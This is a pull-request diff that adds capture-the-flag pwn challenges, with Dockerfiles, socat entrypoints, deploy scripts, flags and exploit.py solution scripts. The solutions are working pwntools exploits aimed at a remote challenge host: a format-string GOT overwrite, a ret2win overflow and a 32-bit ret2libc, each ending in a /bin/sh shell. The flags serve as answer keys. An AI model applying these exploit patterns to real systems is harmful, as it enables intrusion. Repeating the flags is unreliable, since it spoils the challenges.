Skip to content
Open
Show file tree
Hide file tree
Changes from all commits
Commits
File filter

Filter by extension

Filter by extension

Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
32 changes: 32 additions & 0 deletions 2026-2027/pwn/archivist/Dockerfile
Original file line number Diff line number Diff line change
@@ -0,0 +1,32 @@
FROM ubuntu:22.04

RUN apt-get update && apt-get install -y socat && rm -rf /var/lib/apt/lists/*

RUN useradd -m ctf

WORKDIR /home/ctf

COPY ./archivist ./chall
COPY ./flag.txt .
COPY ./libc.so.6 .
COPY ./entrypoint.sh .
COPY ./ld-linux-x86-64.so.2 .

USER root

RUN chown -R root:root /home/ctf

# - Directory: root can write, others can only enter/list (755)
# - Binary/Script: root can write, others can only execute (755)
# - Libc/Flag: root can write, others can only read (444)
RUN chmod 755 /home/ctf && \
chmod 755 /home/ctf/chall && \
chmod 754 /home/ctf/entrypoint.sh && \
chmod 444 /home/ctf/libc.so.6 && \
chmod 444 /home/ctf/flag.txt && \
chmod 755 /home/ctf/ld-linux-x86-64.so.2

USER ctf
EXPOSE 5000

ENTRYPOINT ["./entrypoint.sh"]
Binary file added 2026-2027/pwn/archivist/archivist
Binary file not shown.
2 changes: 2 additions & 0 deletions 2026-2027/pwn/archivist/clean.sh
Original file line number Diff line number Diff line change
@@ -0,0 +1,2 @@
sudo docker rm -f archivist_cont
sudo docker rmi archivist_image
2 changes: 2 additions & 0 deletions 2026-2027/pwn/archivist/description.txt
Original file line number Diff line number Diff line change
@@ -0,0 +1,2 @@
Don't worry, I used printf.
Nothing could possibly go wrong.
9 changes: 9 additions & 0 deletions 2026-2027/pwn/archivist/entrypoint.sh
Original file line number Diff line number Diff line change
@@ -0,0 +1,9 @@
#!/bin/sh

ulimit -t 60
# Limit max memory (KB) - 64MB is plenty for most SROP/Pwn
ulimit -m 65536
# Limit core dump size (prevents filling up disk)
ulimit -c 0

exec socat -T 30 -d TCP-LISTEN:5000,reuseaddr,fork EXEC:"./ld-linux-x86-64.so.2 --library-path /home/ctf ./chall",stderr
39 changes: 39 additions & 0 deletions 2026-2027/pwn/archivist/exploit.py
Original file line number Diff line number Diff line change
@@ -0,0 +1,39 @@
from pwn import *

binary='./archivist'
elf = context.binary = ELF(binary, checksec=False)
libc = ELF('./libc.so.6',checksec=False)
#p=process(binary)
p=remote("15.206.88.115",1330)
#gdb.attach(p)
#context.log_level='debug'

exit_got=0x404028
main=0x4012b0
printf_got=0x404010
# infinite printfs
p.recvuntil(b'> ')
payload=fmtstr_payload(6,{exit_got:main})
print(payload)
p.send(payload)


# getting libc base
p.recvuntil(b'> ')
p.sendline(b'%7$p')
p.recvuntil(b'Archivist Echo: ')
libc_leak=int(p.recvline()[:-1],16)
libcbase=libc_leak-0x202030
libc.address=libcbase
system=libc.symbols['system']
log.critical(f"Libc leak : {hex(libc_leak)}")
log.critical(f"Libc base : {hex(libcbase)}")
log.critical(f"system : {hex(system)}")

p.recvuntil(b'> ')
payload=fmtstr_payload(6,{printf_got:system})
print(payload)
p.send(payload)

p.send(b'/bin/sh') # lil buggy , send input as /bin/sh
p.interactive()
1 change: 1 addition & 0 deletions 2026-2027/pwn/archivist/flag.txt
Original file line number Diff line number Diff line change
@@ -0,0 +1 @@
sudo{f0rm47_s7rings_4r3_700_0ld}
Binary file added 2026-2027/pwn/archivist/ld-linux-x86-64.so.2
Binary file not shown.
Binary file added 2026-2027/pwn/archivist/libc.so.6
Binary file not shown.
12 changes: 12 additions & 0 deletions 2026-2027/pwn/archivist/run.sh
Original file line number Diff line number Diff line change
@@ -0,0 +1,12 @@
sudo docker build -t archivist_image .


sudo docker run -d \
--name archivist_cont \
--restart always \
--memory="256m" \
--memory-swap="256m" \
--cpus=".5" \
--pids-limit=100 \
-p 1330:5000 \
archivist_image
28 changes: 28 additions & 0 deletions 2026-2027/pwn/babypwn/Dockerfile
Original file line number Diff line number Diff line change
@@ -0,0 +1,28 @@
FROM ubuntu:22.04

RUN apt-get update && apt-get install -y socat && rm -rf /var/lib/apt/lists/*

RUN useradd -m ctf

WORKDIR /home/ctf

COPY ./babypwn ./chall
COPY ./flag.txt .
COPY ./entrypoint.sh .

USER root

RUN chown -R root:root /home/ctf

# - Directory: root can write, others can only enter/list (755)
# - Binary/Script: root can write, others can only execute (755)
# - Libc/Flag: root can write, others can only read (444)
RUN chmod 755 /home/ctf && \
chmod 755 /home/ctf/chall && \
chmod 754 /home/ctf/entrypoint.sh && \
chmod 444 /home/ctf/flag.txt

USER ctf
EXPOSE 5000

ENTRYPOINT ["./entrypoint.sh"]
Binary file added 2026-2027/pwn/babypwn/babypwn
Binary file not shown.
2 changes: 2 additions & 0 deletions 2026-2027/pwn/babypwn/clean.sh
Original file line number Diff line number Diff line change
@@ -0,0 +1,2 @@
sudo docker rm -f babypwn_cont
sudo docker rmi babypwn_image
1 change: 1 addition & 0 deletions 2026-2027/pwn/babypwn/description.txt
Original file line number Diff line number Diff line change
@@ -0,0 +1 @@
Every pro was once a Babypwn noob.
9 changes: 9 additions & 0 deletions 2026-2027/pwn/babypwn/entrypoint.sh
Original file line number Diff line number Diff line change
@@ -0,0 +1,9 @@
#!/bin/sh

ulimit -t 60
# Limit max memory (KB) - 64MB is plenty for most SROP/Pwn
ulimit -m 65536
# Limit core dump size (prevents filling up disk)
ulimit -c 0

exec socat -T 30 -d TCP-LISTEN:5000,reuseaddr,fork EXEC:"./chall",stderr
11 changes: 11 additions & 0 deletions 2026-2027/pwn/babypwn/exploit.py
Original file line number Diff line number Diff line change
@@ -0,0 +1,11 @@
from pwn import *

binary='./babypwn'
elf = context.binary = ELF(binary, checksec=False)
#p=process(binary)
p=remote("15.206.88.115",1331)
#gdb.attach(p)
win=0x401196
ret=0x40101a
p.sendline(b'A'*0x48+p64(ret)+p64(win))
p.interactive()
1 change: 1 addition & 0 deletions 2026-2027/pwn/babypwn/flag.txt
Original file line number Diff line number Diff line change
@@ -0,0 +1 @@
sudo{73h_cl4ssic_r372win}
12 changes: 12 additions & 0 deletions 2026-2027/pwn/babypwn/run.sh
Original file line number Diff line number Diff line change
@@ -0,0 +1,12 @@
sudo docker build -t babypwn_image .


sudo docker run -d \
--name babypwn_cont \
--restart always \
--memory="256m" \
--memory-swap="256m" \
--cpus=".5" \
--pids-limit=100 \
-p 1331:5000 \
babypwn_image
32 changes: 32 additions & 0 deletions 2026-2027/pwn/dilema/Dockerfile
Original file line number Diff line number Diff line change
@@ -0,0 +1,32 @@
FROM ubuntu:22.04

RUN apt-get update && apt-get install -y socat && rm -rf /var/lib/apt/lists/*

RUN useradd -m ctf

WORKDIR /home/ctf

COPY ./chall ./chall
COPY ./flag.txt .
COPY ./libc.so.6 .
COPY ./entrypoint.sh .
COPY ./ld-linux.so.2 .

USER root

RUN chown -R root:root /home/ctf

# - Directory: root can write, others can only enter/list (755)
# - Binary/Script: root can write, others can only execute (755)
# - Libc/Flag: root can write, others can only read (444)
RUN chmod 755 /home/ctf && \
chmod 755 /home/ctf/chall && \
chmod 754 /home/ctf/entrypoint.sh && \
chmod 444 /home/ctf/libc.so.6 && \
chmod 444 /home/ctf/flag.txt && \
chmod 755 /home/ctf/ld-linux.so.2

USER ctf
EXPOSE 5000

ENTRYPOINT ["./entrypoint.sh"]
Binary file added 2026-2027/pwn/dilema/chall
Binary file not shown.
2 changes: 2 additions & 0 deletions 2026-2027/pwn/dilema/clean.sh
Original file line number Diff line number Diff line change
@@ -0,0 +1,2 @@
sudo docker rm -f dilema_cont
sudo docker rmi dilema_image
1 change: 1 addition & 0 deletions 2026-2027/pwn/dilema/description.txt
Original file line number Diff line number Diff line change
@@ -0,0 +1 @@
Back to the 32-bit days… smaller registers, bigger headaches.
9 changes: 9 additions & 0 deletions 2026-2027/pwn/dilema/entrypoint.sh
Original file line number Diff line number Diff line change
@@ -0,0 +1,9 @@
#!/bin/sh

ulimit -t 60
# Limit max memory (KB) - 64MB is plenty for most SROP/Pwn
ulimit -m 65536
# Limit core dump size (prevents filling up disk)
ulimit -c 0

exec socat -T 30 -d TCP-LISTEN:5000,reuseaddr,fork EXEC:"./ld-linux.so.2 --library-path /home/ctf ./chall",stderr
46 changes: 46 additions & 0 deletions 2026-2027/pwn/dilema/exploit.py
Original file line number Diff line number Diff line change
@@ -0,0 +1,46 @@
from pwn import *
binary = "./chall"
elf=ELF(binary)
libc=ELF("./libc.so.6")
#p=process(binary)
p=remote("15.206.88.115",1332)
#gdb.attach(p)

puts_plt=elf.plt['puts']
puts_got=elf.got['puts']
main=elf.symbols['main']

log.success(f"puts_plt adress {hex(puts_plt)}")
log.success(f"puts_got adress {hex(puts_got)}")
log.success(f"main adress {hex(main)}")


p.recvuntil("fate")
p.sendline(b"1")
p.recvuntil("words:")

payload=b"A"*76+p32(puts_plt)+p32(main)+p32(puts_got)
p.sendline(payload)
p.recvuntil("enough :(")
p.recvline()

leaked_puts=u32(p.recvline().strip()[:4])
log.success(f"Leaked puts {hex(leaked_puts)}")

libcbase=leaked_puts-libc.symbols['puts']
system=libcbase+libc.symbols['system']
binsh=libcbase+next(libc.search(b'/bin/sh'))

log.success(f"Leaked libcbase {hex(libcbase)}")
log.success(f"Leaked system {hex(system)}")
log.success(f"Leaked binsh {hex(binsh)}")

p.recvuntil("fate")
p.sendline(b"1")
p.recvuntil("words:")

payload=b"A"*76+p32(system)+b"BBBB"+p32(binsh)
p.sendline(payload)


p.interactive()
1 change: 1 addition & 0 deletions 2026-2027/pwn/dilema/flag.txt
Original file line number Diff line number Diff line change
@@ -0,0 +1 @@
sudo{i_b3gg3d_s0_h4rd_i_g07_7h3_fl4g}
Binary file added 2026-2027/pwn/dilema/ld-linux.so.2
Binary file not shown.
Binary file added 2026-2027/pwn/dilema/libc.so.6
Binary file not shown.
12 changes: 12 additions & 0 deletions 2026-2027/pwn/dilema/run.sh
Original file line number Diff line number Diff line change
@@ -0,0 +1,12 @@
sudo docker build -t dilema_image .


sudo docker run -d \
--name dilema_cont \
--restart always \
--memory="256m" \
--memory-swap="256m" \
--cpus=".5" \
--pids-limit=100 \
-p 1332:5000 \
dilema_image
32 changes: 32 additions & 0 deletions 2026-2027/pwn/mines/Dockerfile
Original file line number Diff line number Diff line change
@@ -0,0 +1,32 @@
FROM ubuntu:22.04

RUN apt-get update && apt-get install -y socat && rm -rf /var/lib/apt/lists/*

RUN useradd -m ctf

WORKDIR /home/ctf

COPY ./mines ./chall
COPY ./flag.txt .
COPY ./entrypoint.sh .

USER root

RUN dpkg --add-architecture i386 && \
apt-get update && \
apt-get install -y libc6:i386

RUN chown -R root:root /home/ctf

# - Directory: root can write, others can only enter/list (755)
# - Binary/Script: root can write, others can only execute (755)
# - Libc/Flag: root can write, others can only read (444)
RUN chmod 755 /home/ctf && \
chmod 755 /home/ctf/chall && \
chmod 754 /home/ctf/entrypoint.sh && \
chmod 444 /home/ctf/flag.txt

USER ctf
EXPOSE 5000

ENTRYPOINT ["./entrypoint.sh"]
2 changes: 2 additions & 0 deletions 2026-2027/pwn/mines/clean.sh
Original file line number Diff line number Diff line change
@@ -0,0 +1,2 @@
sudo docker rm -f mines_cont
sudo docker rmi mines_image
1 change: 1 addition & 0 deletions 2026-2027/pwn/mines/description.txt
Original file line number Diff line number Diff line change
@@ -0,0 +1 @@
Mines have been laid…
9 changes: 9 additions & 0 deletions 2026-2027/pwn/mines/entrypoint.sh
Original file line number Diff line number Diff line change
@@ -0,0 +1,9 @@
#!/bin/sh

ulimit -t 60
# Limit max memory (KB) - 64MB is plenty for most SROP/Pwn
ulimit -m 65536
# Limit core dump size (prevents filling up disk)
ulimit -c 0

exec socat -T 30 -d TCP-LISTEN:5000,reuseaddr,fork EXEC:"./chall",stderr
Loading